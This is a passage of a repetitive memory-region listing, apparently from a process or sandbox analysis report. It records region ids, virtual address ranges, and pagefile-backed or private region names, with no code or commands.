0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3114 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3115 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3116 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3117 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3118 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3119 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3120 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3121 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3122 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3123 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 3124 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 3125 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 3126 start_va = 0x2b0000 end_va = 0x2bffff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 3127 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3128 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3129 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3130 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3131 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3132 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3133 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3134 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3135 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3136 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3137 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3138 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3139 start_va = 0x2a0000 
end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3140 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3141 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3142 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3143 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3144 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3145 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3146 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3147 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3148 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3149 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3150 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3151 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3152 
start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3153 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3154 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3155 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3156 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3157 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3158 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3159 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3160 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3161 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3162 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3163 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3164 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 3165 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3166 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3167 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3168 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3169 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3170 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3171 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3172 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3173 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3174 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3175 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3176 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3177 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 3178 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3179 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3263 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 3264 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 3265 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 3266 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 3267 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3268 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3269 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3270 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3271 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3272 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3273 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3274 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3275 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3276 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3277 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3278 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3279 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3280 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3281 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3282 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3283 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3284 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3285 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3286 start_va = 0x2a0000 end_va = 0x2affff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3287 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3288 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3289 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3290 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3313 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3314 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3315 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3316 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3317 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3318 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3319 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3320 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3321 start_va = 0x2a0000 end_va = 
0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3322 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3323 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3324 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3325 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3326 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3327 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3328 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3329 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3330 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3331 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3332 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3333 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3334 start_va = 
0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3335 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3336 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3337 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 3338 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 3339 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 3340 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 3341 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3342 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3343 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3344 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3345 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3346 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3347 
start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3348 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3349 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3350 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3351 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3352 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3353 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3354 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3355 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3356 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3357 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3358 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3359 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 3360 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3361 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3362 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3363 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3364 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3365 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3366 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3367 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3368 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3369 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3370 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3371 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3372 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 3373 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3374 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3375 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3376 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3377 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3378 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3379 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3380 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3381 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3382 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3383 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3384 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3385 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3386 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3387 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3388 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3389 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3390 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3496 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 3497 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 3498 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 3499 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 3500 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3501 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3502 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3503 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3504 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3505 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3506 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3507 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3508 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3509 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3510 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3511 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3512 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3513 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3514 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3515 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3516 start_va = 0x2a0000 end_va = 0x2affff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3517 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3518 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3519 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3520 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3521 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3522 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3523 start_va = 0x2a0000 end_va = 0x2affff entry_point = 